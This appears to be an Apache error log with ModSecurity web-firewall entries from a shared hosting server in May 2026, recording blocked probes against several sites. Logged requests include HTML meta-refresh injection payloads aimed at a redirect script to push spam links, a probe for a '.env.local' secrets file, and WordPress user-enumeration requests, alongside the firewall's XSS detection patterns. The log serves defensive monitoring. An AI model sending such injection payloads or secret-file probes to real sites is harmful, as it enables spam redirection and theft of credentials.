[Mon May 11 17:03:11.325525 2026] [security2:error] [pid 1411099:tid 1411102] [client 194.233.64.127:60387] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrw-Qm4vhlWBPlMjGzAAAAAE"]
[Mon May 11 17:03:11.960182 2026] [security2:error] [pid 1412074:tid 1412080] [client 194.233.64.127:60407] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://images.google.com.np/url?q=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrzJnyuKVXoStDhbCAAAAAEQ"]
[Mon May 11 17:03:11.961911 2026] [security2:error] [pid 1412074:tid 1412080] [client 194.233.64.127:60407] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 /> found within ARGS:url: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh conten..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrzJnyuKVXoStDhbCAAAAAEQ"]
[Mon May 11 17:03:11.963421 2026] [security2:error] [pid 1412074:tid 1412080] [client 194.233.64.127:60407] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 /> found within ARGS:url: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrzJnyuKVXoStDhbCAAAAAEQ"]
[Mon May 11 17:03:11.963958 2026] [security2:error] [pid 1412074:tid 1412080] [client 194.233.64.127:60407] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "W [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrzJnyuKVXoStDhbCAAAAAEQ"]
[Mon May 11 17:03:11.964145 2026] [security2:error] [pid 1412074:tid 1412080] [client 194.233.64.127:60407] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2f%evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763>kampus Telkom bandung</a><meta http-equiv=refresh content=0;url=https://Images.google.com.np/url?q=https://ykm.de/workshop-37763 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSenso [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrzJnyuKVXoStDhbCAAAAAEQ"]
[Mon May 11 17:03:11.964574 2026] [security2:error] [pid 1412074:tid 1412080] [client 194.233.64.127:60407] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrzJnyuKVXoStDhbCAAAAAEQ"]
[Mon May 11 17:03:11.964852 2026] [security2:error] [pid 1412074:tid 1412080] [client 194.233.64.127:60407] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvrzJnyuKVXoStDhbCAAAAAEQ"]
[Mon May 11 17:03:24.935382 2026] [autoindex:error] [pid 1411055:tid 1411067] [client 108.130.92.59:54502] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 17:03:26.973418 2026] [security2:error] [pid 1411099:tid 1411117] [client 176.65.139.168:32934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agHvvg-Qm4vhlWBPlMjG3wAAABE"]
[Mon May 11 17:03:26.973888 2026] [security2:error] [pid 1411099:tid 1411117] [client 176.65.139.168:32934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agHvvg-Qm4vhlWBPlMjG3wAAABE"]
[Mon May 11 17:03:26.974457 2026] [security2:error] [pid 1411099:tid 1411117] [client 176.65.139.168:32934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.domaine-de-janasse.com"] [uri "/.env.local"] [unique_id "agHvvg-Qm4vhlWBPlMjG3wAAABE"]
[Mon May 11 17:03:34.113664 2026] [authz_core:error] [pid 1411201:tid 1411256] [client 47.128.58.228:17578] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/block-patterns/error_log
[Mon May 11 17:03:34.991440 2026] [security2:error] [pid 1411055:tid 1411079] [client 45.133.170.60:47539] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHvxkWKUxpmnkK7zHyLrQAAARY"], referer: https://www.piregwan-genesis.com/
[Mon May 11 17:03:45.139091 2026] [ssl:error] [pid 1411055:tid 1411059] (EAI 2)Name or service not known: [client 34.241.44.41:50844] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:03:45.139415 2026] [ssl:error] [pid 1411055:tid 1411059] AH01941: stapling_renew_response: responder error
[Mon May 11 17:03:52.553034 2026] [ssl:error] [pid 1424905:tid 1424925] (EAI 2)Name or service not known: [client 198.235.24.58:65360] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:03:52.553287 2026] [ssl:error] [pid 1424905:tid 1424925] AH01941: stapling_renew_response: responder error
[Mon May 11 17:03:54.524834 2026] [ssl:error] [pid 1411201:tid 1411250] (EAI 2)Name or service not known: [client 198.235.24.58:64228] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:03:54.524892 2026] [ssl:error] [pid 1411201:tid 1411250] AH01941: stapling_renew_response: responder error
[Mon May 11 17:04:32.382094 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d1b6310a9d6473f4db778f1ca0a8a78a||1778513672||1778513312"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHwAPy_GXSWIKeli0sAYwAAAJU"]
[Mon May 11 17:04:32.382563 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHwAPy_GXSWIKeli0sAYwAAAJU"]
[Mon May 11 17:04:32.383205 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHwAPy_GXSWIKeli0sAYwAAAJU"]
[Mon May 11 17:04:32.522289 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d1b6310a9d6473f4db778f1ca0a8a78a||1778513672||1778513312"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHwAPy_GXSWIKeli0sAZAAAAJU"]
[Mon May 11 17:04:32.522542 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHwAPy_GXSWIKeli0sAZAAAAJU"]
[Mon May 11 17:04:32.522774 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHwAPy_GXSWIKeli0sAZAAAAJU"]
[Mon May 11 17:04:32.662218 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d1b6310a9d6473f4db778f1ca0a8a78a||1778513672||1778513312"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "agHwAPy_GXSWIKeli0sAZgAAAJU"]
[Mon May 11 17:04:32.662418 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "agHwAPy_GXSWIKeli0sAZgAAAJU"]
[Mon May 11 17:04:32.662619 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "agHwAPy_GXSWIKeli0sAZgAAAJU"]
[Mon May 11 17:04:32.802310 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d1b6310a9d6473f4db778f1ca0a8a78a||1778513672||1778513312"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agHwAPy_GXSWIKeli0sAZwAAAJU"]
[Mon May 11 17:04:32.802584 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agHwAPy_GXSWIKeli0sAZwAAAJU"]
[Mon May 11 17:04:32.802806 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agHwAPy_GXSWIKeli0sAZwAAAJU"]
[Mon May 11 17:04:32.943693 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d1b6310a9d6473f4db778f1ca0a8a78a||1778513672||1778513312"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/xmlrpc.php"] [unique_id "agHwAPy_GXSWIKeli0sAaAAAAJU"]
[Mon May 11 17:04:32.943904 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/xmlrpc.php"] [unique_id "agHwAPy_GXSWIKeli0sAaAAAAJU"]
[Mon May 11 17:04:32.944146 2026] [security2:error] [pid 1411201:tid 1411266] [client 34.121.198.102:60138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/xmlrpc.php"] [unique_id "agHwAPy_GXSWIKeli0sAaAAAAJU"]
[Mon May 11 17:04:37.675179 2026] [security2:error] [pid 1412074:tid 1412089] [client 102.165.1.97:62459] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwBTJnyuKVXoStDhbChAAAAE0"], referer: https://www.piregwan-genesis.com/
[Mon May 11 17:06:09.659834 2026] [:error] [pid 1411055:tid 1411058] [client 146.59.127.80:46564] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Mon May 11 17:06:10.962999 2026] [:error] [pid 1412074:tid 1412088] [client 51.91.254.244:58468] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Mon May 11 17:06:16.009687 2026] [security2:error] [pid 1416109:tid 1416136] [client 194.233.64.127:51284] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://maps.google.tk/url?q=http://ezproxy.lib.uh.edu/login?url=http://www.ccof.net/?url=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://maps.google.tk/url?q=http://ezproxy.lib.uh.edu/login?url=http://www.ccof.net/?url=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHwaFV4kyjgo4bQBUhkRwAAAMY"]
[Mon May 11 17:06:16.010655 2026] [security2:error] [pid 1416109:tid 1416136] [client 194.233.64.127:51284] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e>Kampus Telkom Bandung</a><meta http-equiv=refresh content=0;url=https://Maps.Google.tk/url?q=http://ezproxy.lib.Uh.edu/login?url=http://www.ccof.net/?URL=boosty.to/ptsindonesia/posts/3da95c04-fa02-43b7-bbe2-a3f336ef3b0e /> found within ARGS:url: http://u.pc@haedongacademy.org/phpinfo..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  